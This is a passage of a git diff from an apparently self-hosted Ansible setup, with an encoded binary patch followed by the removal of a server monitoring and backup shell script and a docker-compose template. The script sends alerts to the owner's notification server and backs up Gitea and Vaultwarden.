z&YW@8{N3J#M4LEk1^obB%{uF}r5k0?>HzQcSsWn9og`4hmBQ#-pwIo!4;pYMZ}x^C zIoDMc&5DlGyIDGmlB8u?e;f(&>$TGw@9*FG(>mP68wWhm-R1rn5?tF(XA;CpQJ;D-l~i z4`_H{7}Ba1KywI^gp!pw{%HDDyw zPAQYeGEu1RUKY{&$|{ZOsL#OijCBNtlJA`eC+&b;Cx&uJHCWq)QUjha?c4<-xQe;V z8g`-WRQr_T2)HRWwGfb%Zvhl?m~}t-IXP&)9zJ?M4;zt2&e^^b6lm$ZFxlA&aI!&* zSlGd%=W!frS9ot#aNxJNno)AB^`Y$rJK27|No_eTVSY0pMAp|Z_f+`x2p(dzjb>PF z2%im>j!^5gv};Ue>B>fXc#AGA{_^}`eg6z2w^AOpkS8N+W6_l|OV#kmNzNg8Xhb0x zi@_4V`crh%)%PXl^r3so?&FU}CGi3v3?2@dFNLGy?*&~6nwjp%%N!CKG?tCl#i)TU zt$Jv?zaH-Z^d3?W41i_*`CcXesZn>C8=MC6O+RL5E4sOuG?PNcyTTTO)xS2nI0gr{ z@&IaxCz}Fu@fJqlhuMEP1h^Ca{*F&_-P_C1Zs;lnn=-Z|z07<#?UNjO`x9V~fjMyP zx9KA>Uk0bzQtfz#0p}3TZU@@?w|+Prl|K9d!mefXp9DKt{K$u(6eA`Mm=AUi;(YmF z(<9CoalVN2RsE!+)u@Y>g8+p@H|E)}_Sdn6LVD1A0?krSE%R_8}p0 zoD?-c*ol~>Q9P4_hY~ZgAAR(GmNY|a7tUMk*(&b3{%vKIV=TlENTGkBLT7H$snX*IA9a=bCid7mN`sw?x0J)^-(z?P5w&GK%k58 zC`y|Ffyckj9oPC&QcA}s_;xpAbwy{|YsU(jz?$MV!~E7Y$=Rr~^|*j*nCpjXho8-N zwve^)kR+N7Q4(VJTf(Fla{tfdpCjywqKW?vHj!D^oFv#qBG;dEI=({xBwNzv+InFTn!ng>pEnKDBp~37Gdu@PVa*zmN6B zuSX~%N%IZeit%l%p!u!U^B&Y2pr)4=n!jcdy-hcv7)PrD)`K&0vAKnlpjs}1iay20wGH$NQ29Sy)tEc#Il zaY&WH=^feBp~@Ku?+_^&v!$6D+)yBOp;vLc(|TfWaAcr#nH7%koOG`?@@(ps(;KR) z*M_w%6r5~=5;vQSPbUG~%{GaK%{^+o%5d-fO1+U4g=dDfG1>Ez&V)HhWX)z1Kw1@! zrlBlfH@|FRRDD`VRzR9nWypYGAixht76v_H>IO*7`Pl?+l-$PoV~o;pcOaqir?{Su zjR5;F--VYyUaTBQp0Of3FgzDFS99Ft6XBd15;^4w!@?5w3d4W{;+>00!ufCo5O=}Z zIy^b7$%c?hsmmE=3GnHuEjMci~{7uCTzE|Fj)stQ; z=L>TPYNeWL8mRc$^A#^HFdgn;-5z26V6E*0>gw_Yd=lhhvoghw)#=R{uP?!jR2$y` zIK})|41OI;W1yK+b2AZl)~85~?WpDtRRphQfL!3TjYvfbiaWZr9Ais#d=s+b%aV!i zW7zcY!2lN)FlyR+n8kG!RXSyPt1GZ^fv)A?7VhP~CP(NZW)(!=KJetZX3wx`0Tb*T z!DVCyo)|cI5+>6yZo_c1niq!Zs+Rp&{mWou&w$z!r6r}OgYc2kZWX+~56&BPNZY0# zBqO7AA4GrKy@4@Sy~bF+HD&1nuM<>t^GSdnuYFG`66qD9rvB!b_gZL-9JlS3UFyr! 
zET2@z1wz3wMu>WrrZE1l&EKWg@9>XB_m%X0iAVX50R0cZ?C+u;hK8S1-j}#)e05&} zmk zI+h8owtd#N@0e*ZMMW`{51ik8KF7F`Vc*=}{Op|QP(E_W%o z%yTR!H#Ncs$H~D$&xF*kZ!EEl*m}OFqYSJ16&DCXQgJS}MeX}PtUOsq83k_{Iz-X( z4foVPI(wwYAe5+z_*(@l7G+L|TpiE1Q~@@e0pzM?^Z8zzKoZ*XPk)GWElZ=h##9Fp zyhCSxhcmPvu9BB(hUz-+oAGYAusw(B;*z?PJx@=KW~cUrFhW=`h`p#S{l;O>3B*E_ z(V@)b#28~8n?A5##B*{-4&e^OEJY26L_vb>MPbkqZ}X#HzwTl9q-lX7#;Oo19%H!< zruEvSYPc^Yf7N9T*xaIQUjM zST0n-yN!Hsa|vL+p)>t4U#MlsA1J}Z3zy=q>-R6N*Dr^;lW?WbY5S%%zW3X2mu_wx zSJ@)Rv-0#yn%`6@X0lg&k|z-mnb2_90y*4)QzV@K=F#LlQ?E{gYb$3OOoB(V_aZii zd2su#aO;m*0C{9>2P92ZGj}HYd(8|Hg!<2Q>>&I|0}tG++Dza$wXDV5Hx}Y-*Vs(K z+{0%hRAxoWWJeMKSG@-4w6aVRC1bunSEaBOCp%Wk!b-F!(@q8gCcuCXRRTQ=6~Y~x zt$g@UY4`1hsS%}bzL|zHS{7dGYnGM{+_+tB(*?5$7=Jb1VP3)XbzI?W(wsk1H zbGI4IFTL6-1Ln#3^ z!Qr;c>(EJE>J`MwkN1$QDq^Rt!||NLO_ut%gw2jfu*WdvRna;U=baH7n3Id`<2+u< zM|{^thcD${y}ZnM+Lc>M>xbL-n&D8LqBLFs^iN42&WYdq)ua4_RPDuKf7*j)d&i6b zTnXNysb6uj7PP=Vy;YIrs^qQRFn}SsRzo^&2Ka};6{kpd;2;p67`oVWlTKad*P*>* zv33Ge;%ZOtT-+}HmE_%3xiW68sLXxv-O13n+P;L;Z9z!PI&9+J)yP!GZ8x-I+0y$H z-cKSG#?H+4Eb+sSfBtLvZM-h%kIKiVF1oX#gl_cmcPAC~S9fBd(;4G9{3k|=?`t(P zA6;qDxe(PWy|@xB>gLP5zX?3x;epgJusN0xxZE4)S9Qdnak8mPHUQh=LqMX_I#i?b z{mtPeS$NORIF*F!uz_3Yapfl@rb2%2Kjv@sn~4Y%OugNg7=DV5R|>s9L|;$64y=<^ z33o!~(Jf5VM_INfEuie`Jb45n>RxrhGJXEU6UJOLS!(OOYPgrvm{^bLns7V@-+dkxfvJ@ zeW9skd3`=7drTwYzJp4fVC0J7sAanTxa259wtENbzU+0{0B~1#HBf7I0^fYQwlMA6 zfs3?*v=cl^0KVTOu+E>#sf|OnWLH*@M@z{D=W?rLM<*>|4I2!_UG=cmRqU%ZA?-U5 z#)R-ZIVo>ax0PgK*poWHr}2<|rBw;Zsc8yY#H&b8G{1=X@^#<(s{eRJhM(j{&%T7T z++0GNP0yL0vn8-E8MXf8>50`^sG_ctnbgq;4l+)0dL_b4_Nndcpi@UP%`wTZO3D4u zOmM7{UN+xi3fuD+ijv^ViDttN!C z^@btbrFc)D$jpVPD>w(De8KToc>|nsIH`o-9kDa6Ti5K)SO+b^V$@~S`f=4k0geHr zU-fza(s`xBsQZfufji-QJAz$y2>%U_O-q;86MtXR1=!ZE7Tv39_+pmZVm5WEvPrik3n7U zyD(h3yre{qC>CmRD(o%IU!X$FE`HA*Yb{gjzPOilZoGj4q2O+_c6uJ+y^)@-BM@&% z_F|@ot#a6^uKkLKVKLr%d0gP2HRv@vpuV6z`I7S%Ld>MmcxHYn@t z0?WfDU@3rtseB>)e*Cupwc|K&sd``H-gV_j2yfd6zXzS#a)!>|npFMa0BPypF`q;3 
zTu5122YdsXAQ1tukQ}_#PX4Me9de;aY5F`T3k-T#o^!Y1mb^gf+?Ek$0#@Nxs7wns_*X~i-G1Irfr*lQt?$H zpj7?a7bFXcZW|LL^a186$8Okku5$OM7<%Z+^`in{mq396K+OY$UnR4Q=w-feUw*x9 zc$g)HW*' $(nproc) ] && curl -u "$username:$password" -H "Title: Load" -H "ta:battery" -d "`hostname` Load with `uptime`" https://alert.jingoh.fr/{{ alerts_load }} -elif [ "$parametre" = "ping" ]; then - for ip in "${servers[@]}" - do - if [ "$ip" != "$local_ip" ]; then - ping -c 1 "$ip" || curl -u "$username:$password" -H "Title: Ping Server" -H "ta:sos" -d "Server ping failed from `hostname` to $ip" https://alert.jingoh.fr/{{ alerts_ping }} - fi - done -elif [ "$parametre" = "health" ]; then - [ $(curl -s -o /dev/null -w "%{http_code}" https://gitea.jingoh.fr) -gt 400 ] && curl -u "$username:$password" -H "Title: Service gitea" -H "ta:bangbang" -d "No response From gitea.jingoh.fr" https://alert.jingoh.fr/{{ alerts_health }} - [ $(curl -s -o /dev/null -w "%{http_code}" https://vault.jingoh.fr) -gt 400 ] && curl -u "$username:$password" -H "Title: Service vault" -H "ta:bangbang" -d "No response From vault.jingoh.fr" https://alert.jingoh.fr/{{ alerts_health }} - [ $(curl -s -o /dev/null -w "%{http_code}" https://homepage.jingoh.fr) -gt 400 ] && curl -u "$username:$password" -H "Title: Service homepage" -H "ta:bangbang" -d "No response From homepage.jingoh.fr" https://alert.jingoh.fr/{{ alerts_health }} -elif [ "$parametre" = "ssl" ]; then - expiration_timestamp=$(date -d "$(echo | openssl s_client -servername $site -connect $site:443 2>/dev/null | openssl x509 -noout -enddate | cut -d "=" -f 2)" +%s) - current_timestamp=$(date +%s) - difference=$((expiration_timestamp - current_timestamp)) - threshold=$((20 * 24 * 3600)) # 20 jours en secondes - if [ $difference -lt $threshold ]; then - curl -u "$username:$password" -H "Title: HTTPS Certificats" -H "ta:closed_lock_with_key" -d "*.jingoh.fr Less than 20 days" https://alert.jingoh.fr/{{ alerts_ssl }} - fi -elif [ "$parametre" = "backup_git" ]; then - docker exec -u 
git -w /data/ gitea gitea dump -c /data/gitea/conf/app.ini
- mv /opt/dockerapps/appdata/gitea/gitea/gitea-dump-*.zip /opt/dockerapps/backup/
- docker exec gitea-db pg_dump -U root gitea > gitea-db-pg.sql
- mv ./gitea-db-pg.sql /opt/dockerapps/backup/
- curl -u "$username:$password" -H "Title: Backup gitea" -H "ta:inbox_tray" -d "Local Backup gitea done !" https://alert.jingoh.fr/{{ alerts_backup_gitea }}
-elif [ "$parametre" = "backup_vault" ]; then
- docker run --rm --volumes-from=vault -e UID=0 -e BACKUP_DIR=/data/backup -e TIMESTAMP=true -e ENCRYPTION_PASSWORD="$VAULT" bruceforce/vaultwarden-backup manual
- curl -u "$username:$password" -H "Title: Backup vault" -H "ta:inbox_tray" -d "Local Backup vault done !" https://alert.jingoh.fr/{{ alerts_backup_vault }}
-elif [ "$parametre" = "cpu" ]; then
- [ "$(echo "$(ps -eo %cpu --sort=-%cpu | awk 'NR>1 { sum += $1 } END { print sum }') > $(nproc) * 50" | bc)" -eq 1 ] && curl -u "$username:$password" -H "Title: CPU `nproc` cores" -H "ta:warning" -d "High usage `ps -eo %cpu --sort=-%cpu | awk 'NR>1 { sum += $1 } END { print sum }'`" https://alert.jingoh.fr/{{ alerts_cpu }}
-else
- echo "Paramètre invalide : Utilisez [storage|load|ping|health|ssl|backup_git|backup_vault|cpu]"
-fi
diff --git a/templates/docker-compose.yml.j2 b/templates/docker-compose.yml.j2
deleted file mode 100644
index a293c66..0000000
--- a/templates/docker-compose.yml.j2
+++ /dev/null
@@ -1,2 +0,0 @@
-# {{ ansible_managed }}
-{{ dockerapp_compose | to_nice_yaml(indent=3) }}
\ No newline at end of file